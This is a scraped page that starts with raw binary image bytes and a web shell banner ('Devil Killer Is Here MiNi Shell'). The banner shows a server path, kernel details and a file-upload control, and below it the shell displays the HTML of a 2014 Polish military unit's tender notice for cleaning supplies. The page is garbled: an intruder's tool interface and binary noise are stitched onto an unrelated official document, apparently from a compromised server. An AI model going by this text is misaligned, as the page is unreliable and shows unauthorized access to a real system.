JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20140512/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20140512/158796-N-2014.html

<p class="kh_header"><b>Poznań: Dostawa chemii profesjonalnej do utrzymania czystości w bloku żywnościowym, artykułów higienicznych i opakowań jednorazowych oraz sprzętu do utrzymania czystości</b><br>
<b>Numer ogłoszenia: 158796 - 2014; data zamieszczenia: 12.05.2014</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> 14 Wojskowy Oddział Gospodarczy , ul. Bukowska 34, 60-811 Poznań, woj. wielkopolskie, tel. 61 857 48 02, faks 61 857 72 04.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.14wog.wp.mil.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Jednostka Wojskowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawa chemii profesjonalnej do utrzymania czystości w bloku żywnościowym, artykułów higienicznych i opakowań jednorazowych oraz sprzętu do utrzymania czystości.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest dostawa chemii profesjonalnej do utrzymania czystości w bloku żywnościowym, artykułów higienicznych i opakowań jednorazowych oraz sprzętu do utrzymania czystości do zapewnienia prawidłowego funkcjonowania służby żywnościowej 14 Wojskowego Oddziału Gospodarczego w Poznaniu. 
Szczegółowy opis przedmiotu zamówienia oraz zestawienie asortymentowo - ilościowe określa: formularz cenowy załącznik nr 5 (5/1-zadanie 1; 5/2-zadanie 2; 5/3 -zadanie 3 do SIWZ), wymagania przedmiotowe załącznik nr 6 do SIWZ oraz w projekt umowy -część III SIWZ.

Zamawiający dopuszcza składanie ofert częściowych poprzez składanie ofert na poszczególne zadania. Za ofertę częściową uważa się ofertę obejmującą pełny asortyment danego zadania. Liczba zadań 3:
Zadanie nr 1 -Dostawa sprzętu do utrzymania czystości
Zadanie nr 2 -Dostawa chemii profesjonalnej do utrzymania higieny i czystości w bloku żywnościowym
Zadanie nr 3- Dostawa artykułów higienicznych i opakowań jednorazowych

Zamawiający dopuszcza możliwość zwiększenia dostawy ilości asortymentu będącego przedmiotem zamówienia (umowy) w poszczególnych zadaniach w ramach prawa opcji według poniższego opisu:
a)zadanie nr 1 o kwotę 6 304,00 zł netto;
b)zadanie nr 2 o kwotę 12 869,00 zł netto;
c)zadanie nr 3 o kwotę 11 129,85 zł netto
realizacja zamówienia (dostawa asortymentu wraz z fakturą) w ramach prawa opcji musi być zrealizowana najpóźniej do dnia 15 grudnia 2014 r..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 39.20.00.00-0, 39.83.17.00-3, 39.80.00.00-0, 33.70.00.00-0, 39.22.00.00-0.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 3.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.11.2014.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>w tym zakresie Zamawiający wymaga złożenia oświadczenia zgodnie z zał. nr 2 do SIWZ</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>w tym zakresie Zamawiający wymaga złożenia oświadczenia zgodnie z zał. nr 2 do SIWZ</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca musi dysponować pojazdami, sprzętem spełniającym wymogi ADR w przypadku przewozów towarów objętych przepisami ADR - dotyczy zadania nr 2</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>a)dysponują osobami posiadającymi uprawnienia do przeprowadzenia szkolenia całości personelu służby żywnościowej z zakresu BHP w tematyce bezpiecznego użytkowania i posługiwania się dostarczonymi środkami oraz z zakresu GHP i GMP środków oferowanych prze Wykonawcę w zakresie utrzymania higieny w kuchni, stołówce  i magazynie żywnościowym w ujęciu stosowania środków, uzyskania efektu mycia lub/i dezynfekcji i ich wpływu na konsumentów - dotyczy zadania nr 2
b)dysponują osobami posiadającymi kwalifikacje i doświadczenie w tematyce przewożenia substancji, preparatów niebezpiecznych w przypadku przewozów towarów objętych przepisami ADR -  dotyczy zadania nr 2

Ocena spełnienia warunku dokonana będzie na podstawie wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia złożonego przez wykonawcę wraz z ofertą (według wzoru stanowiącego załącznik nr 8, 9 do SIWZ), z zastosowaniem metody: spełnia-nie spełnia.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>w tym zakresie Zamawiający wymaga złożenia oświadczenia zgodnie z zał. nr 2 do SIWZ</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY, USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane roboty budowlane, dostawy lub usługi odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;">zaświadczenie niezależnego podmiotu uprawnionego do kontroli jakości potwierdzającego, że dostarczane produkty odpowiadają określonym normom lub specyfikacjom technicznym;</li>

<li style="margin-bottom: 12px;"><p style="margin: 0px; padding: 0px;">inne dokumenty</p>
<p style="margin: 0px; padding: 0px;">Dokumenty potwierdzające spełnienie wymogów jakościowych i technicznych przez oferowane towary, określone przez Zamawiającego w załączniku nr 6 ( 6/1,  6/2, 6/3) tj: 6.1) dla zadania nr 1:
a)szczotka do szorowania - potwierdzenie spełnienia parametrów wyparzania (odporność włosia na temperaturę),
b)szczotka do szorowania ręcznego - potwierdzenie spełnienia parametrów wyparzania (odporność włosia na temperaturę),
c)dozowniki do płynów dezynfekcyjnych -potwierdzenie zgodności z specyfikacją (folder, broszura itp.)
6.2) dla zadania nr 2:
a)mydło w płynie do rąk
wypis ze zgłoszenia do Krajowego Systemu Informowania o Kosmetykach wprowadzonych do obrotu,
etykieta zaoferowanego produktu,
świadectwo, wynik badania potwierdzający jakość zaoferowanego produktu  i spełnienie wymagań fizyko-chemicznych potwierdzone lub wystawione przez organ uprawniony do kontroli jakości. 

b)płyn do higienicznej dezynfekcji rąk
etykieta zaoferowanego produktu,
karta charakterystyki,
pozwolenie Ministra Zdrowia na obrót preparatem biobójczym,
instrukcja sposobu użycia gwarantująca skuteczność wykonania zabiegów mycia i (lub) dezynfekcji - przedstawiona zgodnie z wzorem oświadczenia.

c)płyn do ręcznego mycia naczyń op. duże
dokument potwierdzający przeznaczenie produktu (ocena, opinia, atest, świadectwo jakości zdrowotnej PZH lub inny równoważny dokument),
etykieta zaoferowanego produktu,
karta charakterystyki,
wynik badania laboratoryjnego potwierdzającego wymagane stężenie procentowe substancji organicznej.

d)płyn do ręcznego mycia naczyń
dokument potwierdzający przeznaczenie produktu (ocena, opinia, atest, świadectwo jakości zdrowotnej PZH lub inny równoważny dokument),
etykieta zaoferowanego produktu,
karta charakterystyki,
wynik badania laboratoryjnego potwierdzającego wymagane stężenie procentowe substancji organicznej.

e)płyn do mechanicznego mycia naczyń
dokument potwierdzający przeznaczenie produktu (ocena, opinia, atest, świadectwo jakości zdrowotnej PZH lub inny równoważny dokument),
etykieta zaoferowanego produktu,
karta charakterystyki,
instrukcja sposobu użycia gwarantująca skuteczność wykonania zabiegów mycia i (lub) dezynfekcji - przedstawiona zgodnie z wzorem oświadczenia.

f)płyn do nabłyszczania w zmywarkach
dokument potwierdzający przeznaczenie produktu (ocena, opinia, atest, świadectwo jakości zdrowotnej PZH lub inny równoważny dokument),
etykieta zaoferowanego produktu,
karta charakterystyki,
instrukcja sposobu użycia gwarantująca skuteczność wykonania zabiegów mycia i (lub) dezynfekcji - przedstawiona zgodnie z wzorem oświadczenia.

g)płyn do mycia i dezynfekcji podłóg i ścian
etykieta zaoferowanego produktu,
karta charakterystyki,
pozwolenie Ministra Zdrowia na obrót preparatem biobójczym,
instrukcja sposobu użycia gwarantująca skuteczność wykonania zabiegów mycia i (lub) dezynfekcji - przedstawiona zgodnie z wzorem oświadczenia.

h)płyn do mycia i dezynfekcji sprzętu i wyposażenia
etykieta zaoferowanego produktu,
karta charakterystyki,
pozwolenie Ministra Zdrowia na obrót preparatem biobójczym,
instrukcja sposobu użycia gwarantująca skuteczność wykonania zabiegów mycia i (lub) dezynfekcji - przedstawiona zgodnie z wzorem oświadczenia.

i) Kwaśny płyn do mycia i dezynfekcji. 
etykieta zaoferowanego produktu,
karta charakterystyki,
pozwolenie Ministra Zdrowia na obrót preparatem biobójczy,
instrukcja sposobu użycia gwarantująca skuteczność wykonania zabiegów mycia i (lub) dezynfekcji- przedstawiona zgodnie z wzorem oświadczenia.

j) kwaśny preparat do dezynfekcji.
etykieta zaoferowanego produktu,
karta charakterystyki,
pozwolenie Ministra Zdrowia na obrót preparatem biobójczym,
instrukcja sposobu użycia gwarantująca skuteczność wykonania zabiegów mycia i (lub) dezynfekcji - przedstawiona zgodnie z wzorem oświadczenia.

k)płyn dezynfekcyjny do kratek ściekowych
etykieta zaoferowanego produktu,
karta charakterystyki,
pozwolenie Ministra Zdrowia na obrót preparatem biobójczym,
instrukcja sposobu użycia gwarantująca skuteczność wykonania zabiegów mycia i (lub) dezynfekcji - przedstawiona zgodnie z wzorem oświadczenia.

l)płyn do usuwania osadów mineralnych
dokument potwierdzający przeznaczenie produktu (ocena, opinia, atest, świadectwo jakości zdrowotnej PZH lub inny równoważny dokument).,
etykieta zaoferowanego produktu,
karta charakterystyki,
instrukcja sposobu użycia gwarantująca skuteczność wykonania zabiegów mycia i (lub) dezynfekcji - przedstawiona zgodnie z wzorem oświadczenia.

ł)płyn do sanitariatów antybakteryjny
etykieta zaoferowanego produktu,
karta charakterystyki,
pozwolenie Ministra Zdrowia na obrót preparatem biobójczym,

m)płyn do usuwania przypaleń ze spryskiwaczem
dokument potwierdzający przeznaczenie produktu (ocena, opinia, atest, świadectwo jakości zdrowotnej PZH lub inny równoważny dokument),
etykieta zaoferowanego produktu,
karta charakterystyki,
instrukcja sposobu użycia gwarantująca skuteczność wykonania zabiegów mycia i (lub) dezynfekcji- przedstawiona zgodnie z wzorem oświadczenia.

n)płyn do usuwania przykrych zapachów ze spryskiwaczem
etykieta zaoferowanego produktu,
karta charakterystyki, 

o)płyn konserwacji stali nierdzewnej - spryskiwacz.
dokument potwierdzający przeznaczenie produktu (ocena, opinia, atest, świadectwo jakości zdrowotnej PZH lub inny równoważny dokument),
etykieta zaoferowanego produktu,
karta charakterystyki,
instrukcja sposobu użycia gwarantująca skuteczność wykonania zabiegów mycia i (lub) dezynfekcji- przedstawiona zgodnie z wzorem oświadczenia.

p)proszek do szorowania
etykieta zaoferowanego produktu,
karta charakterystyki,
dokument potwierdzający przeznaczenie produktu (ocena, opinia, atest, świadectwo jakości zdrowotnej PZH lub inny równoważny dokument),
instrukcja sposobu użycia gwarantująca skuteczność wykonania zabiegów mycia i (lub) dezynfekcji - przedstawiona zgodnie z wzorem oświadczenia.

r)mleczko do czyszczenia.
etykieta zaoferowanego produktu,
karta charakterystyki,
dokument potwierdzający przeznaczenie produktu (ocena, opinia, atest, świadectwo jakości zdrowotnej PZH lub inny równoważny dokument),
instrukcja sposobu użycia gwarantująca skuteczność wykonania zabiegów mycia i (lub) dezynfekcji - przedstawiona zgodnie z wzorem oświadczenia.

s)odkamieniacz do ekspresów do kawy
etykieta zaoferowanego produktu,
dokument potwierdzający przeznaczenie produktu (ocena, opinia, atest, świadectwo jakości zdrowotnej PZH lub inny równoważny dokument).

t)sól do zmywarek 
etykieta zaoferowanego produktu,
dokument potwierdzający przeznaczenie produktu (ocena, opinia, atest, świadectwo jakości zdrowotnej PZH lub inny równoważny dokument).

u)płyn Ecolab Oven Cleaner Power lub równoważny
etykieta zaoferowanego produktu,
karta charakterystyki,
dokument potwierdzający przeznaczenie produktu (ocena, opinia, atest, świadectwo jakości zdrowotnej PZH lub inny równoważny dokument).

v)płyn Ecolab Oven Rinse Power lub równoważny
etykieta zaoferowanego produktu,
karta charakterystyki,
dokument potwierdzający przeznaczenie produktu (ocena, opinia, atest, świadectwo jakości zdrowotnej PZH lub inny równoważny dokument).


6.3) dla zadania nr 3:
a)woreczki foliowe HDPE 14/4/32. -dokument potwierdzający przeznaczenie produktu (ocena, opinia, atest, świadectwo jakości zdrowotnej PZH lub inny równoważny dokument) albo udokumentowanie oznaczenia produktu określeniem -do kontaktu z żywnością-lub odpowiednim symbolem w formie folderu, katalogu, etykiety, zdjęcia, części opakowania produktu zgodnie z rozporządzeniem 1935/2004 Parlamentu Europejskiego i Rady.

b)reklamówka 25-30x6x45cm popularna-dokumenty wymagane, które należy dołączyć do oferty - dokument potwierdzający przeznaczenie produktu (ocena, opinia, atest, świadectwo jakości zdrowotnej PZH lub inny równoważny dokument) albo udokumentowanie oznaczenia produktu określeniem -do kontaktu z żywnością- lub odpowiednim symbolem w formie folderu, katalogu, etykiety, zdjęcia, części opakowania produktu zgodnie z rozporządzeniem 1935/2004 Parlamentu Europejskiego i Rady.

c)folia aluminiowa do żywności szer. 28 cm. - dokumenty wymagane, które należy dołączyć do oferty - dokument potwierdzający przeznaczenie produktu (ocena, opinia, atest, świadectwo jakości zdrowotnej PZH lub inny równoważny dokument) albo udokumentowanie oznaczenia produktu określeniem -do kontaktu z żywnością-  lub odpowiednim symbolem w formie folderu, katalogu, etykiety, zdjęcia, części opakowania produktu zgodnie z rozporządzeniem 1935/2004 Parlamentu Europejskiego i Rady.

d)papier pakowy półpergamin.-dokumenty wymagane, które należy dołączyć do oferty - dokument potwierdzający przeznaczenie produktu (ocena, opinia, atest, świadectwo jakości zdrowotnej PZH lub inny równoważny dokument) albo udokumentowanie oznaczenia produktu określeniem -do kontaktu z żywnością-  lub odpowiednim symbolem w formie folderu, katalogu, etykiety, zdjęcia, części opakowania produktu zgodnie z rozporządzeniem 1935/2004 Parlamentu Europejskiego i Rady.

e)ręczniki papierowe w roli
etykieta zaoferowanego produktu,
świadectwo jakości produktu.

f)druciak metalowy - dokument potwierdzający przeznaczenie produktu (ocena, opinia, atest, świadectwo jakości zdrowotnej PZH lub inny równoważny dokument).

g)zmywaki z gąbką do naczyń
dokument potwierdzający przeznaczenie produktu (ocena, opinia, atest, świadectwo jakości zdrowotnej PZH lub inny równoważny dokument).

h)fartuch jednorazowy a 50 - dokument potwierdzający przeznaczenie produktu (ocena, opinia, atest, świadectwo jakości zdrowotnej PZH lub inny równoważny dokument).

i)folia do żywności stretch 45 cm x 200 m - dokument potwierdzający przeznaczenie produktu (ocena, opinia)

j)rękawice jednorazowe lateksowe -dokument potwierdzający przeznaczenie produktu (ocena, opinia, atest, świadectwo jakości zdrowotnej PZH lub inny równoważny dokument) albo udokumentowanie oznaczenia produktu określeniem - do kontaktu z żywnością-  lub odpowiednim symbolem w formie folderu, katalogu, etykiety, zdjęcia, części opakowania produktu zgodnie z rozporządzeniem 1935/2004 Parlamentu Europejskiego i Rady.
k)rękawice jednorazowe foliowe - dokumenty wymagane, które należy dołączyć do oferty - dokument potwierdzający przeznaczenie produktu (ocena, opinia, atest, świadectwo jakości zdrowotnej PZH lub inny równoważny dokument) albo udokumentowanie oznaczenia produktu określeniem - do kontaktu z żywnością-  lub odpowiednim symbolem w formie folderu, katalogu, etykiety, zdjęcia, części opakowania produktu zgodnie z rozporządzeniem 1935/2004 Parlamentu Europejskiego i Rady.

l)worki do pakowania próżniowego 150x250 -dokumenty wymagane, które należy dołączyć do oferty - dokument potwierdzający przeznaczenie produktu (ocena, opinia, atest, świadectwo jakości zdrowotnej PZH lub inny równoważny dokument) albo udokumentowanie oznaczenia produktu określeniem -do kontaktu z żywnością-  lub odpowiednim symbolem w formie folderu, katalogu, etykiety, zdjęcia, części opakowania produktu zgodnie z rozporządzeniem 1935/2004 Parlamentu Europejskiego i Rady.

m)worki do pakowania próżniowego 200x300 -dokumenty wymagane, które należy dołączyć do oferty - dokument potwierdzający przeznaczenie produktu (ocena, opinia, atest, świadectwo jakości zdrowotnej PZH lub inny równoważny dokument) albo udokumentowanie oznaczenia produktu określeniem - do kontaktu z żywnością- lub odpowiednim symbolem w formie folderu, katalogu, etykiety, zdjęcia, części opakowania produktu zgodnie z rozporządzeniem 1935/2004 Parlamentu Europejskiego i Rady.</p></li>



</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Oferta musi zawierać:
a)formularz oferty, stanowiący załącznik nr 1 do SIWZ;
b)formularze cenowe, stanowiące załącznik nr 5 (5/1-zadanie 1; 5/2-zadanie 2; 5/3-zadanie 3) do SIWZ;
c)dokumenty i oświadczenia wymienione w rozdziale VI SIWZ;
d)wykaz osób, które będą przeprowadzać przeszkolenia personelu służby żywnościowej z zakresu BHP w tematyce bezpiecznego użytkowania i posługiwania się dostarczonymi środkami oraz z zakresu GHP i GMP środków oferowanych przez Wykonawcę w zakresie utrzymania higieny w kuchni, stołówce i magazynie żywnościowym w ujęciu stosowania środków, uzyskania efektu mycia lub/i dezynfekcji i ich wpływu na konsumentów wraz z informacjami na temat uprawnień dotyczących przeprowadzania szkoleń z tego zakresu dotyczy zadania nr 2 - wzór załącznik nr 8 do SIWZ;
e)wykaz osób, które będą przewozić substancje i preparaty niebezpieczne wraz informacjami o kwalifikacjach i doświadczeniu do przewozu materiałów niebezpiecznych tych osób w przypadku przewozu towarów objętych przepisami ADR dotyczy zadania nr 2 - wzór załącznik nr 9 do SIWZ;
f)oświadczenie na potwierdzenie dysponowania potencjałem technicznym o posiadaniu lub dysponowaniu pojazdami, sprzętem spełniającym wymogi ADR- dotyczy zadania nr 2 - wzór załącznik nr 10 do SIWZ;
g)Przedstawienie oświadczenia - Instrukcji sposobu użycia gwarantującą skuteczność wykonania zabiegów mycia lub/i dezynfekcji zgodnie z wymaganiami przedmiotowymi - dotyczy zadania nr 2 dla pozycji nr 2, 5-12, 14, 16-18 wzór załącznik nr 7 do SIWZ;
h)dokument/ty potwierdzające uprawnienie do podpisania oferty (w przypadku kserokopii potwierdzone za zgodność z oryginałem przez Wykonawcę) lub pełnomocnictwa jeżeli  uprawnienia do podpisania oferty nie wynikają  z załączonych dokumentów (w przypadku kserokopii potwierdzone za zgodność z oryginałem notarialnie).</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1.Umowa na wykonanie zamówienia sporządzona będzie zgodnie z projektem stanowiącym część III  do SIWZ  -  Projekt umowy dla zadania nr 1, 2 i 3).
2.W razie zaistnienia istotnej zmiany okoliczności powodującej, że wykonanie umowy nie leży w interesie publicznym, czego nie można było przewidzieć w chwili zawarcia umowy, zamawiający może odstąpić od umowy w terminie 30 dni od powzięcia wiadomości o tych okolicznościach. W takim przypadku wykonawca może żądać wyłącznie wynagrodzenia należnego z tytułu wykonania części umowy. 
